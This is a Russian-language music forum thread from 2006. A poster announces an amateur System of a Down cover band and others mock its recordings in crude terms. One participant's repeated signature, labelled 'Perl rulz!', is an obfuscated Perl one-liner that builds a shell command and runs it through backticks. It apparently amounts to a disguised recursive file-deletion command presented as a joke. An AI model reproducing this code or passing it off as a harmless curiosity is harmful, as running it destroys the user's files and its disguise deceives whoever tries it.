Добавлено: Сб Июл 29, 2006 10:05 pm Заголовок сообщения: Новая группа типа Системы
Здравствуйте любители System of a down/Мы тут с пацанами подумали и решили сделать группу что то на подобии системы.Пока поём их песни своих ещё нет зайдите на наш сайт и послушайте как мы поём наши песни располагаются здесь http://whitelight.5bb.ru/viewtopic.php?id=2 на нашем форуме ,если же вы хотите по-подробнее ознакомиться с нашей группой то вам сюда http://link-zone.awardspace.com/
я конечно не зверь, но писать с ошибками у тебя беспонтово получается)))) это раз) и это имхо))) пиши лучше без ошибок
два, опрос бы лучше сделать побольше разных пунктов типа играют нормально но на соад не похоже и тд
три, ща заценю, но тему перенесу все равно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Последний раз редактировалось: ALuserX (Сб Июл 29, 2006 10:13 pm), всего редактировалось 1 раз
я с народа качать не буду, я не до такой степени извращенец _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Июл 30, 2006 3:14 am Заголовок сообщения:
я извращенец поэтому скачал
Короче так займесь чем нибудь другим музыка это не для вас.
Записали на комп через самый херовый микрофон,на гитаре играете хренова,солист если его так можно назвать, совсем не умеет петь,ну никого голоса и слуха,похоже в детстве медведы очень часто наступали на уши.Произношение англ. языка хуже некуда.
И вообще какая вы группа?2 человека с одной гитарой?
Не прикасайтесь больше к Соад,если бы они это услышали.... _________________ АЙС
знач правильно сделали что на народ выложили, так меньше людей "это" услышат)))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
прикол в тему:
там у джона немножко сайт торпедо-комикс обновился
короче после того как я, рамон и мож еще кто-то его с ДР поздравил по этому адресу там убрали адрес мыла)))) так что теперь и джону даже не напишешь)))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
прикол в тему:
там у джона немножко сайт торпедо-комикс обновился
короче после того как я, рамон и мож еще кто-то его с ДР поздравил по этому адресу там убрали адрес мыла)))) так что теперь и джону даже не напишешь))))
у нас то он остался,заманить бы их в Москву,хотя что бы мне попасть на их концерт наверное придётся дождаться окончание их отпуска и поехать в ближайшую страну где они будут давать концерт _________________ АЙС
имхо в первую очередь в армению поедут _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Авг 06, 2006 2:56 am Заголовок сообщения:
лобзик, выложи куда-нибудь эти творения, а то я с народа скачал - все висит и ничего не играет) _________________ Fortuna non penis in manus non recipe
Добавлено: Вс Авг 06, 2006 3:25 am Заголовок сообщения:
они еще и записаны криво!! _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Авг 06, 2006 3:58 am Заголовок сообщения:
ну скорость качания от народа не сильно отличается, хорошо что в архиве))) есть время подумать) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!